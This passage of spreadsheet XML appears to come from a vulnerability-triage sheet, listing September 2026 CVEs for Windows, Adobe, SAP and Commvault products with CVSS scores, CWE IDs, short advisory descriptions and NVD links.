or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t></is></c></row><row r="610"><c r="A610" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C610" s="5" t="inlineStr"><is><t>CVE-2026-73007</t></is></c><c r="D610" s="5" t="n"><v>7.8</v></c><c r="E610" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F610" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G610" s="5" t="inlineStr" /><c r="H610" s="5" t="n"><v>0.002</v></c><c r="I610" s="5" t="inlineStr" /><c r="J610" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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0" s="5" t="inlineStr" /><c r="M610" s="5" t="inlineStr" /><c r="N610" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P610" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q610" s="5" t="inlineStr" /><c r="R610" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S610" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t></is></c></row><row r="611"><c r="A611" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C611" s="5" t="inlineStr"><is><t>CVE-2026-73011</t></is></c><c r="D611" s="5" t="n"><v>7.8</v></c><c r="E611" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F611" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G611" s="5" t="inlineStr" /><c r="H611" s="5" t="n"><v>0.002</v></c><c r="I611" s="5" t="inlineStr" /><c r="J611" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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1" s="5" t="inlineStr" /><c r="M611" s="5" t="inlineStr" /><c r="N611" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P611" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q611" s="5" t="inlineStr" /><c r="R611" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S611" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t></is></c></row><row r="612"><c r="A612" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B612" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C612" s="5" t="inlineStr"><is><t>CVE-2026-73014</t></is></c><c r="D612" s="5" t="n"><v>7.8</v></c><c r="E612" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F612" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G612" s="5" t="inlineStr" /><c r="H612" s="5" t="n"><v>0.003</v></c><c r="I612" s="5" t="inlineStr" /><c r="J612" s="5" t="inlineStr" /><c r="K612" s="5" t="inlineStr" /><c r="L612" s="5" t="inlineStr" /><c r="M612" s="5" t="inlineStr" /><c r="N612" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P612" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q612" s="5" t="inlineStr" /><c r="R612" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S612" s="5" t="inlineStr"><is><t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t></is></c></row><row r="613"><c r="A613" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B613" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C613" s="5" t="inlineStr"><is><t>CVE-2026-73015</t></is></c><c r="D613" s="5" t="n"><v>7.8</v></c><c r="E613" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F613" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G613" s="5" t="inlineStr" /><c r="H613" s="5" t="n"><v>0.002</v></c><c r="I613" s="5" t="inlineStr" /><c r="J613" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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3" s="5" t="inlineStr" /><c r="M613" s="5" t="inlineStr" /><c r="N613" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P613" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q613" s="5" t="inlineStr" /><c r="R613" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S613" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t></is></c></row><row r="614"><c r="A614" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B614" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C614" s="5" t="inlineStr"><is><t>CVE-2026-73020</t></is></c><c r="D614" s="5" t="n"><v>7.8</v></c><c r="E614" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F614" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G614" s="5" t="inlineStr" /><c r="H614" s="5" t="n"><v>0.002</v></c><c r="I614" s="5" t="inlineStr" /><c r="J614" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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4" s="5" t="inlineStr" /><c r="M614" s="5" t="inlineStr" /><c r="N614" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P614" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q614" s="5" t="inlineStr" /><c r="R614" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S614" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t></is></c></row><row r="615"><c r="A615" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B615" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C615" s="5" t="inlineStr"><is><t>CVE-2026-73021</t></is></c><c r="D615" s="5" t="n"><v>7.8</v></c><c r="E615" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F615" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G615" s="5" t="inlineStr" /><c r="H615" s="5" t="n"><v>0.003</v></c><c r="I615" s="5" t="inlineStr" /><c r="J615" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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5" s="5" t="inlineStr" /><c r="M615" s="5" t="inlineStr" /><c r="N615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P615" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q615" s="5" t="inlineStr" /><c r="R615" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S615" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t></is></c></row><row r="616"><c r="A616" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B616" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C616" s="5" t="inlineStr"><is><t>CVE-2026-73024</t></is></c><c r="D616" s="5" t="n"><v>7.8</v></c><c r="E616" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F616" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G616" s="5" t="inlineStr" /><c r="H616" s="5" t="n"><v>0.002</v></c><c r="I616" s="5" t="inlineStr" /><c r="J616" s="5" t="inlineStr" /><c r="K616" s="5" t="inlineStr" /><c r="L616" s="5" t="inlineStr" /><c r="M616" s="5" t="inlineStr" /><c r="N616" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P616" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q616" s="5" t="inlineStr" /><c r="R616" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S616" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t></is></c></row><row r="617"><c r="A617" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B617" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C617" s="5" t="inlineStr"><is><t>CVE-2026-73026</t></is></c><c r="D617" s="5" t="n"><v>7.8</v></c><c r="E617" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F617" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G617" s="5" t="inlineStr" /><c r="H617" s="5" t="n"><v>0.002</v></c><c r="I617" s="5" t="inlineStr" /><c r="J617" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61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7" s="5" t="inlineStr" /><c r="M617" s="5" t="inlineStr" /><c r="N617" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P617" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q617" s="5" t="inlineStr" /><c r="R617" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S617" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t></is></c></row><row r="618"><c r="A618" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B618" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C618" s="5" t="inlineStr"><is><t>CVE-2026-7476</t></is></c><c r="D618" s="5" t="n"><v>7.8</v></c><c r="E618" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F618" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G618" s="5" t="inlineStr" /><c r="H618" s="5" t="n"><v>0.001</v></c><c r="I618" s="5" t="inlineStr" /><c r="J618" s="5" t="inlineStr" /><c r="K618" s="5" t="inlineStr" /><c r="L618" s="5" t="inlineStr" /><c r="M618" s="5" t="inlineStr" /><c r="N618" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P618" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q618" s="5" t="inlineStr" /><c r="R618" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S618" s="5" t="inlineStr"><is><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is></c><c r="T618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t></is></c></row><row r="619"><c r="A619" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B619" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C619" s="5" t="inlineStr"><is><t>CVE-2026-7477</t></is></c><c r="D619" s="5" t="n"><v>7.8</v></c><c r="E619" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F619" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G619" s="5" t="inlineStr" /><c r="H619" s="5" t="n"><v>0.001</v></c><c r="I619" s="5" t="inlineStr" /><c r="J619" s="5" t="inlineStr" /><c r="K619" s="5" t="inlineStr" /><c r="L619" s="5" t="inlineStr" /><c r="M619" s="5" t="inlineStr" /><c r="N619" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P619" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q619" s="5" t="inlineStr" /><c r="R619" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S619"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is></c><c r="T619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t></is></c></row><row r="620"><c r="A620" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B620" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C620" s="5" t="inlineStr"><is><t>CVE-2026-75631</t></is></c><c r="D620" s="5" t="n"><v>7.8</v></c><c r="E620" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F620" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G620" s="5" t="inlineStr" /><c r="H620" s="5" t="n"><v>0.002</v></c><c r="I620" s="5" t="inlineStr" /><c r="J620" s="5" t="inlineStr" /><c r="K620" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L620" s="5" t="inlineStr" /><c r="M620" s="5" t="inlineStr" /><c r="N620" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P620" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q620" s="5" t="inlineStr" /><c r="R620" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S620" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t></is></c></row><row r="621"><c r="A621" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B621" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C621" s="5" t="inlineStr"><is><t>CVE-2026-75771</t></is></c><c r="D621" s="5" t="n"><v>7.8</v></c><c r="E621" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F621" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G621" s="5" t="inlineStr" /><c r="H621" s="5" t="n"><v>0.002</v></c><c r="I621" s="5" t="inlineStr" /><c r="J621" s="5" t="inlineStr" /><c r="K621" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L621" s="5" t="inlineStr" /><c r="M621" s="5" t="inlineStr" /><c r="N621" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P621" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q621" s="5" t="inlineStr" /><c r="R621" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S62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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t></is></c></row><row r="622"><c r="A622" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C622" s="5" t="inlineStr"><is><t>CVE-2026-75862</t></is></c><c r="D622" s="5" t="n"><v>7.8</v></c><c r="E622" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F622" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G622" s="5" t="inlineStr" /><c r="H622" s="5" t="n"><v>0.002</v></c><c r="I622" s="5" t="inlineStr" /><c r="J622" s="5" t="inlineStr" /><c r="K622" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L622" s="5" t="inlineStr" /><c r="M622" s="5" t="inlineStr" /><c r="N622" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P622" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q622" s="5" t="inlineStr" /><c r="R622" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S622"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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t></is></c></row><row r="623"><c r="A623" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B623" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C623" s="5" t="inlineStr"><is><t>CVE-2026-75863</t></is></c><c r="D623" s="5" t="n"><v>7.8</v></c><c r="E623" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F623" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G623" s="5" t="inlineStr" /><c r="H623" s="5" t="n"><v>0.002</v></c><c r="I623" s="5" t="inlineStr" /><c r="J623" s="5" t="inlineStr" /><c r="K623" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L623" s="5" t="inlineStr" /><c r="M623" s="5" t="inlineStr" /><c r="N623" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P623" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q623" s="5" t="inlineStr" /><c r="R623" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S623"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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t></is></c></row><row r="624"><c r="A624" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C624" s="5" t="inlineStr"><is><t>CVE-2026-75992</t></is></c><c r="D624" s="5" t="n"><v>7.8</v></c><c r="E624" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F624" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G624" s="5" t="inlineStr" /><c r="H624" s="5" t="n"><v>0.002</v></c><c r="I624" s="5" t="inlineStr" /><c r="J624" s="5" t="inlineStr" /><c r="K624" s="5" t="inlineStr" /><c r="L624" s="5" t="inlineStr" /><c r="M624" s="5" t="inlineStr" /><c r="N624" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P624" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q624" s="5" t="inlineStr" /><c r="R624" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S624" s="5" t="inlineStr"><is><t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t></is></c></row><row r="625"><c r="A625" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C625" s="5" t="inlineStr"><is><t>CVE-2026-76967</t></is></c><c r="D625" s="5" t="n"><v>7.8</v></c><c r="E625" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F625" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G625" s="5" t="inlineStr" /><c r="H625" s="5" t="n"><v>0.002</v></c><c r="I625" s="5" t="inlineStr" /><c r="J625" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K625" s="5" t="inlineStr" /><c r="L625" s="5" t="inlineStr" /><c r="M625" s="5" t="inlineStr" /><c r="N625" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P625" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q625" s="5" t="inlineStr" /><c r="R625" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S625" s="5" t="inlineStr"><is><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is></c><c r="T625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t></is></c></row><row r="626"><c r="A626" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C626" s="5" t="inlineStr"><is><t>CVE-2026-77091</t></is></c><c r="D626" s="5" t="n"><v>7.8</v></c><c r="E626" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G626" s="5" t="inlineStr" /><c r="H626" s="5" t="n"><v>0.001</v></c><c r="I626" s="5" t="inlineStr" /><c r="J626" s="5" t="inlineStr" /><c r="K626" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L626" s="5" t="inlineStr" /><c r="M626" s="5" t="inlineStr" /><c r="N626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P626" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q626" s="5" t="inlineStr" /><c r="R626" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S626" s="5" t="inlineStr"><is><t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t></is></c><c r="T626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t></is></c></row><row r="627"><c r="A627" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B627" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C627" s="5" t="inlineStr"><is><t>CVE-2026-77489</t></is></c><c r="D627" s="5" t="n"><v>7.8</v></c><c r="E627" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F627" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G627" s="5" t="inlineStr" /><c r="H627" s="5" t="n"><v>0.003</v></c><c r="I627" s="5" t="inlineStr" /><c r="J627" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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7" s="5" t="inlineStr" /><c r="M627" s="5" t="inlineStr" /><c r="N627" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P627" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q627" s="5" t="inlineStr" /><c r="R627" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S627" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t></is></c></row><row r="628"><c r="A628" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B628" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C628" s="5" t="inlineStr"><is><t>CVE-2026-77500</t></is></c><c r="D628" s="5" t="n"><v>7.8</v></c><c r="E628" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F628" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G628" s="5" t="inlineStr" /><c r="H628" s="5" t="n"><v>0.003</v></c><c r="I628" s="5" t="inlineStr" /><c r="J628" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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8" s="5" t="inlineStr" /><c r="M628" s="5" t="inlineStr" /><c r="N628" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P628" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q628" s="5" t="inlineStr" /><c r="R628" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S628" s="5" t="inlineStr"><is><t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t></is></c></row><row r="629"><c r="A629" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B629" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C629" s="5" t="inlineStr"><is><t>CVE-2026-77503</t></is></c><c r="D629" s="5" t="n"><v>7.8</v></c><c r="E629" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G629" s="5" t="inlineStr" /><c r="H629" s="5" t="n"><v>0.002</v></c><c r="I629" s="5" t="inlineStr" /><c r="J629" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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29" s="5" t="inlineStr" /><c r="M629" s="5" t="inlineStr" /><c r="N629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P629" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q629" s="5" t="inlineStr" /><c r="R629" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S629" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t></is></c></row><row r="630"><c r="A630" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C630" s="5" t="inlineStr"><is><t>CVE-2026-77904</t></is></c><c r="D630" s="5" t="n"><v>7.8</v></c><c r="E630" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F630" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G630" s="5" t="inlineStr" /><c r="H630" s="5" t="n"><v>0.002</v></c><c r="I630" s="5" t="inlineStr" /><c r="J630" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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30" s="5" t="inlineStr" /><c r="M630" s="5" t="inlineStr" /><c r="N630" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P630" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q630" s="5" t="inlineStr" /><c r="R630" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S630" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t></is></c></row><row r="631"><c r="A631" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C631" s="5" t="inlineStr"><is><t>CVE-2026-78447</t></is></c><c r="D631" s="5" t="n"><v>7.8</v></c><c r="E631" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F631" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G631" s="5" t="inlineStr" /><c r="H631" s="5" t="n"><v>0.002</v></c><c r="I631" s="5" t="inlineStr" /><c r="J631" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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31" s="5" t="inlineStr" /><c r="M631" s="5" t="inlineStr" /><c r="N631" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P631" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q631" s="5" t="inlineStr" /><c r="R631" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S631" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t></is></c></row><row r="632"><c r="A632" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C632" s="5" t="inlineStr"><is><t>CVE-2026-78448</t></is></c><c r="D632" s="5" t="n"><v>7.8</v></c><c r="E632" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F632" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G632" s="5" t="inlineStr" /><c r="H632" s="5" t="n"><v>0.002</v></c><c r="I632" s="5" t="inlineStr" /><c r="J632" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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32" s="5" t="inlineStr" /><c r="M632" s="5" t="inlineStr" /><c r="N632" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P632" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q632" s="5" t="inlineStr" /><c r="R632" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S632" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t></is></c></row><row r="633"><c r="A633" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B633" s="5" t="inlineStr"><is><t>New</t></is></c><c 